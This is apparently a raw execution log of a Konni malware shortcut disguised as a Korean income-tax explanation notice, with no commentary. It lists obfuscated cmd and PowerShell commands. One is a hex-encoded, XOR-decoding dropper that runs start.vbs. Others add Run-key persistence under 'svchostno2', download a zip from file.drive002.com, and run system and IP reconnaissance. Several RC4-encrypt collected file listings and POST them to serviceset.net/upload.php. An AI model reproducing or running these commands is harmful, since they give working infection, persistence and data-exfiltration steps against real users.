Konni_종합소득세 해명자료 제출 안내.lnk

cmd.exe "C:\Windows\system32\cmd.exe" /c kLAimNRUoEGuatlUuOKkLLLwVCMvhezlxBGZbIyumICTZzlcbtwSXzTaUTdtXdrCkKpsDzfNVgPktpqbuxogRqLFconpPdMhSkUTqokuzEMGupdlsPXOzXXRDMCoYSeMmfhGAcsodnWboJlPsrwN||goto&p^ow^e^rs^he^l^l -windowstyle hidden $dedicte="$loped='247772726D6D706649203D204765742D4C6F636174696F6E3B244F70586F464574654845596D6A68467A66203D204765742D4368696C644974656D202D5061746820247772726D6D706649202D52656375727365202A2E6C6E6B207C2077686572652D6F626A656374207B245F2E6C656E677468202D6571202D457772726D2D7D207C2053656C6563742D4F626A656374202D457870616E6450726F70657274792046756C6C4E616D653B696628244F70586F464574654845596D6A68467A662E6C656E677468202D6571203029207B247772726D6D706649203D2024656E763A54656D703B244F70586F464574654845596D6A68467A66203D204765742D4368696C644974656D202D5061746820247772726D6D706649202D52656375727365202A2E6C6E6B207C2077686572652D6F626A656374207B245F2E6C656E677468202D6571202D457772726D2D7D207C2053656C6563742D4F626A656374202D457870616E6450726F70657274792046756C6C4E616D653B7D3B247772726D6D706649203D2053706C69742D5061746820244F70586F464574654845596D6A68467A663B24426E785667756D4768203D204E65772D4F626A6563742053797374656D2E494F2E46696C6553747265616D28244F70586F464574654845596D6A68467A662C205B53797374656D2E494F2E46696C654D6F64655D3A3A4F70656E2C205B53797374656D2E494F2E46696C654163636573735D3A3A52656164293B24426E785667756D47682E5365656B282D6D706649544F2D2C205B53797374656D2E494F2E5365656B4F726967696E5D3A3A426567696E293B247643474B7046637A734A6153203D204E65772D4F626A65637420627974655B5D202D70586F464574652D3B24426E785667756D47682E5265616428247643474B7046637A734A61532C20302C202D70586F464574652D293B246C47794E7573745952434B6C4E726273203D20244F70586F464574654845596D6A68467A662E737562737472696E6728302C244F70586F464574654845596D6A68467A662E6C656E6774682D34293B666F722824693D303B2469202D6C7420247643474B7046637A734A61532E636F756E743B24692B2B29207B20247643474B7046637A734A61535B24695D203D20247643474B7046637A734A61535B24695D202D62786F722030783737207D20736320246C47794E7573745952434B6C4E72627320247643474B7046637A734A6153202D456E636F64696E6720427974653B2620246C47794E7573745952434B6C4E7262733B24426E785667756D47682E5365656B282D4845596D6A68467A2D2C205B53797374656D2E494F2E5365656B4F726967696E5D3A3A426567696E293B2473576248676D7A6F7A415261423D4E65772D4F626A65637420627974655B5D202D6654426E785667756D2D3B24426E785667756D47682E52656164282473576248676D7A6F7A415261422C20302C202D6654426E785667756D2D293B24426E785667756D47682E436C6F736528293B52656D6F76652D4974656D202D5061746820244F70586F464574654845596D6A68467A66202D466F7263653B24704C416A6674626F72484A7A546D74443D24656E763A7075626C6963202B20275C27202B20272D4768517643474B7046632D273B666F722824693D303B2469202D6C74202473576248676D7A6F7A415261422E636F756E743B24692B2B29207B202473576248676D7A6F7A415261425B24695D203D202473576248676D7A6F7A415261425B24695D202D62786F722030783737207D73632024704C416A6674626F72484A7A546D7444202473576248676D7A6F7A41526142202D456E636F64696E6720427974653B24705044764F767164764D4F7859203D206E65772D6F626A656374202D636F6D207368656C6C2E6170706C69636174696F6E3B2473505075774B4B49517A203D2024705044764F767164764D4F78592E4E616D6573706163652824704C416A6674626F72484A7A546D7444293B24705044764F767164764D4F78592E4E616D6573706163652824656E763A7075626C6963202B20275C27202B2027646F63756D656E747327292E436F707948657265282473505075774B4B49517A2E6974656D7328292C203130343429207C206F75742D6E756C6C3B72656D6F76652D6974656D202D706174682024704C416A6674626F72484A7A546D7444202D666F7263653B2461756A6E7664444D6D566A726A4D4B673D24656E763A7075626C69632B275C646F63756D656E74735C73746172742E766273273B26202461756A6E7664444D6D566A726A4D4B673B';$bytes = for($i = 0; $i -lt $loped.Length;$i += 2){[System.Convert]::ToByte($loped.Substring($i, 2), 16);};$hoikd = [System.Text.Encoding]::ASCII.GetString($bytes);$hoikd = $hoikd -replace '-Ewrrm-', '0x001ABC72';$hoikd = $hoikd -replace '-mpfITO-', '0x00003A7E';$hoikd = $hoikd -replace '-pXoFEte-', '0x00014000';$hoikd = $hoikd -replace '-HEYmjhFz-', '0x00017A7E';$hoikd = $hoikd -replace '-fTBnxVgum-', '0x0001456B';$hoikd = $hoikd -replace '-GhQvCGKpFc-', '14897.zip';Invoke-Expression $hoikd;";Invoke-Expression $dedicte;

reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v svchostno2 /t REG_SZ /d "C:\Users\Public\Documents\start.vbs" /f

powershell.exe powershell -command "$url = 'https://file.drive002.com/read/get.php?cu=ln3&so=xu6502';$DbSkKATDIdemOXdG = 'C:\Users\Public\Documents\77583.zip';iwr -Uri $url -OutFile $DbSkKATDIdemOXdG;"

nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

tasklist.exe tasklist

systeminfo.exe systeminfo

timeout.exe timeout -t 5 /nobreak

powershell.exe powershell -command "function ESTR{param ([Parameter(Mandatory=$true)] [string]$PlainText,[Parameter(Mandatory=$true)] [string]$Key);$plainBytes = [System.Text.Encoding]::UTF8.GetBytes($PlainText); $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $keyBytes[$i % $keyBytes.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encryptedBytes = New-Object byte[] $plainBytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $plainBytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encryptedBytes[$n] = $plainBytes[$n] -bxor $s[$t];}$encryptedString = [System.Convert]::ToBase64String($encryptedBytes);return $encryptedString;}$key=(Get-Date).Ticks.ToString();$cxKIDwmZkAoWZwMY='http://serviceset.net/upload.php';$fn='TEST22-PC_cuserdown.txt';$fp='C:\Users\Public\Documents\cuserdown.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ESTR -PlainText $fn -Key $key;$dt=ESTR -PlainText $dt -Key $key;$query = [System.Web.HttpUtility]::ParseQueryString('');$query['fn']=$fn;$query['fd']=$dt;$query['r']=$key;$b=$query.ToString();$ba=[System.Text.Encoding]::UTF8.GetBytes($b);$r=[System.Net.WebRequest]::Create($cxKIDwmZkAoWZwMY);$r.Method='POST';$r.ContentType='application/x-www-form-urlencoded';$r.ContentLength=$ba.Length;$rS = $r.GetRequestStream();$rS.Write($ba,0,$ba.Length);$rS.Close();$rp=$r.GetResponse();if($rp.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\upok.txt';New-Item -ItemType File -Path $fpok;}"

powershell.exe powershell -command "function ESTR{param ([Parameter(Mandatory=$true)] [string]$PlainText,[Parameter(Mandatory=$true)] [string]$Key);$plainBytes = [System.Text.Encoding]::UTF8.GetBytes($PlainText); $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $keyBytes[$i % $keyBytes.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encryptedBytes = New-Object byte[] $plainBytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $plainBytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encryptedBytes[$n] = $plainBytes[$n] -bxor $s[$t];}$encryptedString = [System.Convert]::ToBase64String($encryptedBytes);return $encryptedString;}$key=(Get-Date).Ticks.ToString();$cxKIDwmZkAoWZwMY='http://serviceset.net/upload.php';$fn='TEST22-PC_cuserdocu.txt';$fp='C:\Users\Public\Documents\cuserdocu.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ESTR -PlainText $fn -Key $key;$dt=ESTR -PlainText $dt -Key $key;$query = [System.Web.HttpUtility]::ParseQueryString('');$query['fn']=$fn;$query['fd']=$dt;$query['r']=$key;$b=$query.ToString();$ba=[System.Text.Encoding]::UTF8.GetBytes($b);$r=[System.Net.WebRequest]::Create($cxKIDwmZkAoWZwMY);$r.Method='POST';$r.ContentType='application/x-www-form-urlencoded';$r.ContentLength=$ba.Length;$rS = $r.GetRequestStream();$rS.Write($ba,0,$ba.Length);$rS.Close();$rp=$r.GetResponse();if($rp.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\upok.txt';New-Item -ItemType File -Path $fpok;}"

powershell.exe powershell -command "function ESTR{param ([Parameter(Mandatory=$true)] [string]$PlainText,[Parameter(Mandatory=$true)] [string]$Key);$plainBytes = [System.Text.Encoding]::UTF8.GetBytes($PlainText); $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $keyBytes[$i % $keyBytes.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encryptedBytes = New-Object byte[] $plainBytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $plainBytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encryptedBytes[$n] = $plainBytes[$n] -bxor $s[$t];}$encryptedString = [System.Convert]::ToBase64String($encryptedBytes);return $encryptedString;}$key=(Get-Date).Ticks.ToString();$cxKIDwmZkAoWZwMY='http://serviceset.net/upload.php';$fn='TEST22-PC_cuserdesk.txt';$fp='C:\Users\Public\Documents\cuserdesk.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ESTR -PlainText $fn -Key $key;$dt=ESTR -PlainText $dt -Key $key;$query = [System.Web.HttpUtility]::ParseQueryString('');$query['fn']=$fn;$query['fd']=$dt;$query['r']=$key;$b=$query.ToString();$ba=[System.Text.Encoding]::UTF8.GetBytes($b);$r=[System.Net.WebRequest]::Create($cxKIDwmZkAoWZwMY);$r.Method='POST';$r.ContentType='application/x-www-form-urlencoded';$r.ContentLength=$ba.Length;$rS = $r.GetRequestStream();$rS.Write($ba,0,$ba.Length);$rS.Close();$rp=$r.GetResponse();if($rp.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\upok.txt';New-Item -ItemType File -Path $fpok;}"

reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v svchostno2 /t REG_SZ /d "C:\Users\Public\Documents\start.vbs" /f

powershell.exe powershell -command "$url = 'https://file.drive002.com/read/get.php?cu=ln3&so=xu6502';$DbSkKATDIdemOXdG = 'C:\Users\Public\Documents\77583.zip';iwr -Uri $url -OutFile $DbSkKATDIdemOXdG;"

nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

tasklist.exe tasklist

timeout.exe timeout -t 5 /nobreak

powershell.exe powershell -command "function ESTR{param ([Parameter(Mandatory=$true)] [string]$PlainText,[Parameter(Mandatory=$true)] [string]$Key);$plainBytes = [System.Text.Encoding]::UTF8.GetBytes($PlainText); $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $keyBytes[$i % $keyBytes.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encryptedBytes = New-Object byte[] $plainBytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $plainBytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encryptedBytes[$n] = $plainBytes[$n] -bxor $s[$t];}$encryptedString = [System.Convert]::ToBase64String($encryptedBytes);return $encryptedString;}$key=(Get-Date).Ticks.ToString();$cxKIDwmZkAoWZwMY='http://serviceset.net/upload.php';$fn='TEST22-PC_cuserdown.txt';$fp='C:\Users\Public\Documents\cuserdown.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ESTR -PlainText $fn -Key $key;$dt=ESTR -PlainText $dt -Key $key;$query = [System.Web.HttpUtility]::ParseQueryString('');$query['fn']=$fn;$query['fd']=$dt;$query['r']=$key;$b=$query.ToString();$ba=[System.Text.Encoding]::UTF8.GetBytes($b);$r=[System.Net.WebRequest]::Create($cxKIDwmZkAoWZwMY);$r.Method='POST';$r.ContentType='application/x-www-form-urlencoded';$r.ContentLength=$ba.Length;$rS = $r.GetRequestStream();$rS.Write($ba,0,$ba.Length);$rS.Close();$rp=$r.GetResponse();if($rp.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\upok.txt';New-Item -ItemType File -Path $fpok;}"

powershell.exe powershell -command "function ESTR{param ([Parameter(Mandatory=$true)] [string]$PlainText,[Parameter(Mandatory=$true)] [string]$Key);$plainBytes = [System.Text.Encoding]::UTF8.GetBytes($PlainText); $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $keyBytes[$i % $keyBytes.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encryptedBytes = New-Object byte[] $plainBytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $plainBytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encryptedBytes[$n] = $plainBytes[$n] -bxor $s[$t];}$encryptedString = [System.Convert]::ToBase64String($encryptedBytes);return $encryptedString;}$key=(Get-Date).Ticks.ToString();$cxKIDwmZkAoWZwMY='http://serviceset.net/upload.php';$fn='TEST22-PC_cuserdocu.txt';$fp='C:\Users\Public\Documents\cuserdocu.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ESTR -PlainText $fn -Key $key;$dt=ESTR -PlainText $dt -Key $key;$query = [System.Web.HttpUtility]::ParseQueryString('');$query['fn']=$fn;$query['fd']=$dt;$query['r']=$key;$b=$query.ToString();$ba=[System.Text.Encoding]::UTF8.GetBytes($b);$r=[System.Net.WebRequest]::Create($cxKIDwmZkAoWZwMY);$r.Method='POST';$r.ContentType='application/x-www-form-urlencoded';$r.ContentLength=$ba.Length;$rS = $r.GetRequestStream();$rS.Write($ba,0,$ba.Length);$rS.Close();$rp=$r.GetResponse();if($rp.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\upok.txt';New-Item -ItemType File -Path $fpok;}"

powershell.exe powershell -command "function ESTR{param ([Parameter(Mandatory=$true)] [string]$PlainText,[Parameter(Mandatory=$true)] [string]$Key);$plainBytes = [System.Text.Encoding]::UTF8.GetBytes($PlainText); $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $keyBytes[$i % $keyBytes.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encryptedBytes = New-Object byte[] $plainBytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $plainBytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encryptedBytes[$n] = $plainBytes[$n] -bxor $s[$t];}$encryptedString = [System.Convert]::ToBase64String($encryptedBytes);return $encryptedString;}$key=(Get-Date).Ticks.ToString();$cxKIDwmZkAoWZwMY='http://serviceset.net/upload.php';$fn='TEST22-PC_cuserdesk.txt';$fp='C:\Users\Public\Documents\cuserdesk.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ESTR -PlainText $fn -Key $key;$dt=ESTR -PlainText $dt -Key $key;$query = [System.Web.HttpUtility]::ParseQueryString('');$query['fn']=$fn;$query['fd']=$dt;$query['r']=$key;$b=$query.ToString();$ba=[System.Text.Encoding]::UTF8.GetBytes($b);$r=[System.Net.WebRequest]::Create($cxKIDwmZkAoWZwMY);$r.Method='POST';$r.ContentType='application/x-www-form-urlencoded';$r.ContentLength=$ba.Length;$rS = $r.GetRequestStream();$rS.Write($ba,0,$ba.Length);$rS.Close();$rp=$r.GetResponse();if($rp.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\upok.txt';New-Item -ItemType File -Path $fpok;}"